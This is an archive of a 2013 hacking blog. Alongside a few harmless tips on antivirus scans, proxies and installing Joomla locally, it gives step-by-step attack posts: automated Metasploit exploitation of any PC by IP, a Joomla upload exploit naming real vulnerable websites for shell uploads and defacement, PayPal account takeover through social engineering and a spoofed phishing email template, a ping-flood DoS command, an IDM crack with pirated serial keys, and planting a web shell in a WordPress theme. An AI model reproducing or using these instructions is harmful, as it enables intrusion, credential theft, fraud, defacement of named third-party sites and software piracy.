;

Archive for 2013

Hack any PC using IP via Metasploit

Hack any PC using IP via Metasploit

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgreSQL for your database.
Download here:http://www.ihelpgadget.com/
Make sure you use all the defaults or Metasploit won't work!

3.) Now lets get down to business... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't worry, this is normal.

6.)Type db_host to make sure you are connected correctly.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
watch the auto-exploitation start, go play Halo for a while, and then come back...

9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.
Tuesday, 17 September 2013
Posted by Rock Alber
2 Comments
Tag :

How to fast scan full computer

Scan Full Computer Fast With Avast

Asalam-0-Alikum,

1) First go to  http://www.avast.com And Download The Trial Version its free.

2) After install Click on Avast icon and go to Security Tab.



3) Go To Antivirus then  Scroll down.
















4) Then See The Last Option it is Boot Scan  Go There and click on Schedule Now And Restart Your Computer.

Wednesday, 24 July 2013
Posted by Rock Alber
2 Comments
Tag :

How to make a invisible folder

How To Make invisible Folder

Today I'm going to teach you how to make a invisible folder. 

 This can be used for several things.

 Today I'm going to teach you how.

 1. Right click the "Folder"
Properties -> Customize -> Change Icon 


Now Click "Apply"

Now you see a invisible folder with a name

Now to get a invisible name press these

Hold alt then PRESS 0160 

Then click the Enter key.

Congrats, now you should have a invisible folder


Monday, 22 July 2013
Posted by Rock Alber
0 Comments
Tag :

Admin finder

Not seen this on here so thought i'd share it. This is not my program.
Its simply to use so anyone can use it and is pretty successful in finding those admin pages
Saturday, 20 July 2013
Posted by Rock Alber
0 Comments
Tag :

Hack Twitter Using Phishing Method

Hack Twitter Using Phishing Method


There's a scam spreading through Twitter Direct messages (DIVIs) and fake emails. appealing users to visit a fake twitter phishing site i.e "twittler.com". Scam uses a hijacked Twitter account to send out direct messages that appear completely legitimate Security blogger. Janne Ahlberg blogged about this new phishing scam. "This is a nasty trick especially when the sender is someone you know and trust If you receive a suspicious DM or email from a person you know and trust, just warn him/her — the account is most likely hijacked and controlled by the attackers." 

The webpage resembles a Twitter login page and is trying to obtain your Twitter login credentials with a domain name looks very similar to original Twitter.com. with two extra word "LL" in it 
To play it safe, double-check your browser address bar to make sure that's where you are on orginal website twitter.com before logging in. 

If you enter your Twitter username and password into this site. you will become a victim of and the hacker will then control your Twitter account to hack more users via spamming them on your behalf. 

What do you do if your account is hacked? Change your password immediately. Check what applications you've given access to your account. Revoke access for any suspicious applications, and delete tweets and DIVIs you sent and received while your account was compromised 

Monday, 15 July 2013
Posted by Rock Alber
0 Comments
Tag :

Joomla component (com_media) Vulnerability


Joomla component (com_media) Vulnerability [#] Exploit Title: Com_Media (CMS JOOMLA)
[#] Date: 12-06-2013
[#] Author: Sultan Haikal
[#] Version: 2.5
[# ]Tested on: Windows Xp & Linux 
[#] Dork :-   "inurl:com_media"

 [#] TarGet With Example :- 
Target :- www.ayrshirebridge.co.uk 

Just Add This After The Url :- /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

URL :- http://www.ayrshirebridge.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Click Browse at bottom upload your shell in png or jpej format using tamper data. OR

You can also Simply Upload Your Deface In Txt Format.

FInal :- Deface Goes Here 
site.com/images/yourfilename.txt

Eg : http://ayrshirebridge.co.uk/images/x.txt

Thats All :D

 [#] Vulnerable Website :

 Com_Media Vulnerable Websites :-
www.ayrshirebridge.co.uk
www.magicrete.in 
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de

www.ablogic.de
Posted by Rock Alber
0 Comments
Tag :

Hack Paypal Account Easy Way

How To Hack PayPal Easy Way


Cracking PayPal Accounts!

Well! Cracking involves many method! Social Engineering, Guessing.....But the probability of this method is very low!

Social Engineering:In this method u know whom u are gonna hack and have contact with them!

1. Lets consider that u are making some deals with some person, whos pp u
are gonna hack!so probably u wuld know his Paypal E-mail...2. Now try 
to collect as much as info that u could possibly collect from him, like 
phone numbers, address[For address u could make a transcation with him 
and u could easily obtain his Address]3. Now go to Pyapal website! clik 
on "Forgot Password" or "forgot E-mail" prefer forgot email method! and a
bit easier!Try with all the infos u have about him! this should more 
probably work!

Gettin more infos about the victim!If u select forgot password from 
paypal site, after entering the e-mail and the visula confirmation text 
in the preferred box u could see a drop down boxwhich contains last 
digits of Credit cards Bank Accounts and Phone numbers!Its better to 
take a note of all these!

[Try cacking with this info]

Lets come to the main part! Phishing

The current situation has become worser! even if u had successfully 
Phished a PP account u get the SECURITY MEASURE limitation in minutes!

So! have to start a new method of phishing!

Before going further Download the Phisher [The code has not been 
completed,Those who knows download them and modify a bit]Download 
HereSteps:

1. Hmmm.Ok.. got ur phisher! and as i said u should have known Victims CC's Last 2 Digits!

2. Now put in ur link as

Code:

 http://ur_site.com/index.php?cc=XX

 [XX=Last two digits of CC number u got]

3. Now thats it ur phisher is all set and now and now u have to send only the link to ur victim!

E-mail Format:

Code:

 <html lang="en-GB"><head> <meta content="text/html; 
charset=utf-8" http-equiv="Content-Type"> <style 
type="text/css"></style> <script>

</script><script charset="utf-8" id="injection_graph_func" 
src="mail%20format_files/injection_graph_func.js"></script></head><body
bgcolor="#ffffff"> <table align="center" bgcolor="#cccccc" 
border="0" cellpadding="1" cellspacing="0" width="98%"> <tr> 
<td> <a name="m_11bef44b7766d974"></a><table 
bgcolor="#efefef" border="0" cellpadding="1" cellspacing="0" 
width="100%" height="843"> <tbody><tr 
bgcolor="#ffffff"><td height="820"> <div> <div 
style="width: 831; height: 882"><table align="center" border="0" 
cellpadding="0" cellspacing="0" width="600"><tbody><tr 
valign="top"><td><a href="https://www.paypal.com/row" 
target="_blank"><img src="mail%20format_files/email_logo.gif" 
alt="PayPal" border="0" width="255" 
height="35"></a></td></tr></tbody></table><table
align="center" border="0" cellpadding="0" cellspacing="0" 
width="100%"><tbody><tr><td 
background="mail%20format_files/bg_clk.gif" width="100%"><img 
alt="" src="mail%20format_files/pixel.gif" border="0" height="29" 
width="1"></td></tr><tr><td><img alt="" 
src="mail%20format_files/pixel.gif" border="0" height="10" 
width="1"></td></tr></tbody></table><table
align="center" border="0" cellpadding="0" cellspacing="0" 
width="600"><tbody><tr><td></td></tr></tbody></table><table
align="center" border="0" cellpadding="0" cellspacing="0" width="600" 
height="821"><tbody><tr valign="top"><td width="100%" 
height="821"><table align="right" bgcolor="#cccccc" border="0" 
cellpadding="1" cellspacing="0" 
width="190"><tbody><tr><td><table align="center"
bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" 
width="100%"><tbody><tr><td><table 
align="center" bgcolor="#eeeeee" border="0" cellpadding="5" 
cellspacing="0" width="100%"><tbody><tr><td 
align="center"><span>PayPal – The safer, easier way to 
pay</span></td></tr></tbody></table><table
align="center" border="0" cellpadding="5" cellspacing="0" 
width="100%"><tbody><tr><td><ul><li>Use
your credit card without exposing your card number to 
merchants.</li></ul><ul><li>Speed through 
checkout without stopping to enter your card number or 
address.</li></ul><ul><li>Send money to family 
and friends for free.</li></ul><p><img alt="" 
src="mail%20format_files/pixel.gif" border="0" height="5" 
width="1"></td></tr></tbody></table></td></tr></tbody></table><table
align="center" bgcolor="#ffffff" border="0" cellpadding="0" 
cellspacing="0" 
width="100%"><tbody><tr><td><table 
align="center" bgcolor="#eeeeee" border="0" cellpadding="5" 
cellspacing="0" width="100%"><tbody><tr><td 
align="center">Fight fake 
emails</td></tr></tbody></table><table 
align="center" border="0" cellpadding="5" cellspacing="0" 
width="100%"><tbody><tr><td><ul><li>Forward
suspicious emails to <a 
href="http://mail.google.com/mail/h/14j2r4...f%40paypal.com" 
target="_blank">spoof@paypal.com</a>.</li></ul><ul><li>Make
sure you're using the latest internet 
browser.</li></ul><ul><li>Visit the PayPal 
Security Center.</li></ul><p><br><img alt="" 
src="mail%20format_files/pixel.gif" border="0" height="5" 
width="1"></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td></td></tr></tbody></table><p><span>Confirm
Your Email Address!<br><br></span>Dear Black 
Bay,<br><br></p><p>To complete your 
<span>PayPal account</span>, you must <span>click the 
link below</span> and enter your password on the following page to
confirm your email address.</p><table align="center" 
bgcolor="#ffe65c" border="0" cellpadding="1" cellspacing="0" 
width="300"><tbody><tr><td><table align="center"
bgcolor="#fffecd" border="0" cellpadding="4" cellspacing="0" 
width="100%"><tbody><tr><td align="center"><a 
href="https://www.paypal.com/row/ece/cn=14...gp%2e89%40gmai l%2ecom" 
target="_blank">Click here to activate your 
account</a></td></tr></tbody></table></td></tr></tbody></table><p><br></p><p>You
can also confirm your email address by logging into your PayPal account
at <a href="https://www.paypal.com/row/" 
target="_blank">https://www.paypal.com/row/</a>. Click on 
<span>Confirm Email</span> in the <span>To Do 
List</span> and then enter this confirmation number: 
1423-5450-0472-3892-5873<br><br>Sincerely,<br>PayPal<br><br></p><hr><p>Please
do not reply to this email. This mailbox is not monitored and you will 
not receive a response. For assistance, <a 
href="https://www.paypal.com/row/cgi-bin/?cmd=_login-run" 
target="_blank">log in</a> to your PayPal account and click the
Help link in the top right corner of any PayPal 
page.<br><br>To receive email notifications in plain text 
instead of HTML, <a href="https://www.paypal.com/row/PREFS-NOTI" 
target="_blank">update your 
preferences</a>.</p><p><br><br></p><hr
width="400"><p><span>Copyright ? 1999-2008 PayPal. All 
rights reserved.<br><br>Consumer advisory- PayPal Pte. Ltd.,
the holder of PayPal’s stored value<br>facility, does not require
the approval of the Monetary Authority of Singapore.<br>Users are
advised to read the terms and conditions 
carefully.<br></span><br><span>PayPal Email ID 
PP468</span></p><p></p></td></tr></tbody></table></div>
</div> </td></tr></tbody></table> <a 
name="m_"></a> </td> </tr> </table> 
</body></html>

This is a Basic Format [Layout]Change the text contents as ur Needs]

[Tips: Before Sending the Phisher link go to paypal site and Clik on 
"Forgot Password" and select Verfication By E-mail! Do this 3-5 times. 
this would make the scene better]

Now u can tell ur victim that his account has been accessed by Third Person blah-blah-- Make the email more better!

If he logs in Then u could get his Login e-mail, password and probably 
his cc! so no need to panic for "SECURITY MEASURES LIMITATION"


The Success Rate in this process is to High
If any problem feel free To Comment
Posted by Rock Alber
0 Comments
Tag :

How to access Blocked Website


Asalam-0-Alikum,
Today am going to show you how to open "Blocked Sites" in your country
Like Youtube Blocked in Pakistan
So...Here is Some Methods for access these sites

1) You can use proxy sites.Here is Some sites:
http://www.proxy-service.de/
http://www.unblock-proxy.net/
https://www.proxyssl.org/
http://www.proxfree.com/
https://www.vidproxy.com/
http://proxysurf4.me/
http://anonymouse.org/anonwww.html

2) Second method is "VPN".Its is very secure for anonymous browsing so you can find some free or paid vpn
3) The third and also  my favorite is TOR Browser. It is very good browser for surfing anonymous and its also free :)
  
Sunday, 14 July 2013
Posted by Rock Alber
3 Comments
Tag :

How install Joomla on Local server (localhost)

joomla cms on your localhost
things you required
1- Apache server (xampp or wampp)
2- Joomla Cms (download from official website)



okay...
lets get started..install xampp in your computer
now you can see
C:\xampp folder in your C driver
paste your joomlacms that is zipped when downloaded...and extract it in
C:\xampp\htdocs folder
oka..after extracting rename the joomlazipped extracted folder to joomla or whatever that you can remembers
oka now open your browser
and type localhost or 127.0.0.1
you can see xampp default page there..
goto phpmyadmin by
localhost/phpmyadmin
when its open...create database name as 'joomla'
and save it
now open localhost/joomla  (note: joomla is the name of folder that you copied in xampp/htdocs/)
you will see installation wizard
follow the wizard and press next
when it ask for database name .. type joomla (that we created in phpmyadmin)
username = root
and leave password field empty

now press next ,... it will ask for  site basic info , like site name , admin password etc, type whatever you want...and  then finaly its done.... now it requried you to delete
xampp/htdocs/joomla/installation directory..
when you delete installation .. you can view your new joomla cms as
localhost/joomla
and for admin panel.. type
localhost/joomla/administrator
and give admin username/password and then you can confgure site for you :)
Posted by Rock Alber
0 Comments
Tag :

Ddos Attack With Command Prompt

 Send A DDOS Attack Using CMD

DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

------------------------
DoS Attack Stands For Denial of Service Attack
------------------------
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com)

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack
Enjoy :)
Post By RockAlber 
Please Join my Facebook Here
Thursday, 11 July 2013
Posted by Rock Alber
2 Comments
Tag :

Hack or crack IDM manually

Hack or crack IDM manually

 Step 1: Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.

Step 2: Now Go to START => Then go to RUN and type the following text and click enter:
notepad %windir%\system32\drivers\etc\hosts
Step 3: Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below you'll see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on apply and then click on Ok, now u will be able to edit the hosts file and save changes in it.

Detail Note about Granting Permission In Windows7:For Windows 7 users, due to security reasons you will not be able to save hosts file.so follow this steps :First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see the hosts file.
Now right click on hosts file and go to its properties then go to Security tab select Users under Group or user names and click on edit button,Permission For Host Window will get open, in that window select Users account and grant permission in bellow section which is "Permission for SYSTEM" by clicking all check box under "Allow" Name and press Ok.Dnt click on any Deny check box.
Note : If  you have login through admin then skip this Step 6 .Its just for granting permission for editing file.

Step4: Now a notepad file appears something like this as shown below:

Now copy the below lines of code and add to hosts file as shown above image box :
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com

After adding these piece of code, save the notepad file. And exit from there.

Step5: Now open IDM and click on Registration. When you click on registration, Now a new dialog(window) appears that is asking for Name, Last Name, Email Address and Serial Key.

Step 6: Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:
RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M
And click on ok to register.

Step 7: After you click ok, it will show an message that you have registered IDM successfully.

Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire.

That means it will remain full version for lifetime and you can update it without any problem in future.

proof of Successfully Hacking IDM:

Note : To update idm you have to remove those websites added in the host file, after removing those website,save that Hosts file and update IDM software. After successful updation again follow above steps to crack Internet Download manager.                    
Sunday, 7 July 2013
Posted by Rock Alber
0 Comments
Tag :

Shell Upload in Wordpress




Wordpress Shell Upl0ading...
---------------------------|
Start


Today im Going To Sh0w y0uh h0w To Upl0AD Shell
On WordPRess....... Easy waY.... ;) ;)

===========/
1) Wordpress Site +Username +Password 2) MadSpot Security Team Shell =))

....------/

1) Login To y0ur hacked WordpREss SiTe...

2) nOw gOt0 Theme Editor..
   --- wp-admin/theme-editor.php

3) On y0ur Right Side..Choose 404.php

4) Edit it And Paste Y0ur Madspot Shell Code in 404.php nd Save !t..

5) Now, you will see some thing like :
---- /home/Themename/public_html/wp-content/themes/themename/404.php&theme=themename&a=te&scrollto=0

6) Now Delete every thing before /wp-content/ and every thing after 404.php....

7) URl will be www.site.com/wp-content/themes/themename/404.php

7) Now Press Enter and Shell Execute ;)
 Note:- This Is Just For Educational Purpose ONLY!
--------// This Post Is Written By RockAlber~~
--------Enj0y...
Posted by Rock Alber
0 Comments
Tag :

Like Our Page

Popular Post

This Blog For Learn About Hacking And Security. Powered by Blogger.

- Copyright © 2013 Cyber Rock Hacker's Zone Powered by Cyber Rock Hacker Team - Designed by Rock Alber -